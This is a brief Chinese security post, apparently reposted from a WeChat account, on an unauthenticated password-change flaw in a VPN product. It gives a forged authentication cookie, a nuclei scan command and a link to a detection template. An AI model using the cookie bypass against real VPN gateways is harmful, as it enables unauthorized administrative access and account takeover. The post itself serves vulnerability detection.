Cookie: admin_id=1; gw_admin_ticket=1;
漏洞检测:
./nuclei -u https://vpn.xxx.com/ -t unauthenticated-qax-vpn-access.yaml
nuclei检测poc:
nuclei-templates:
https://github.com/UltimateSec/ultimaste-nuclei-templates/blob/main/qax-vpn/unauthenticated-qax-vpn-access.yaml
原文始发于微信公众号(极致攻防实验室):某vpn 任意用户密码修改 附检测POC (nuclei)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论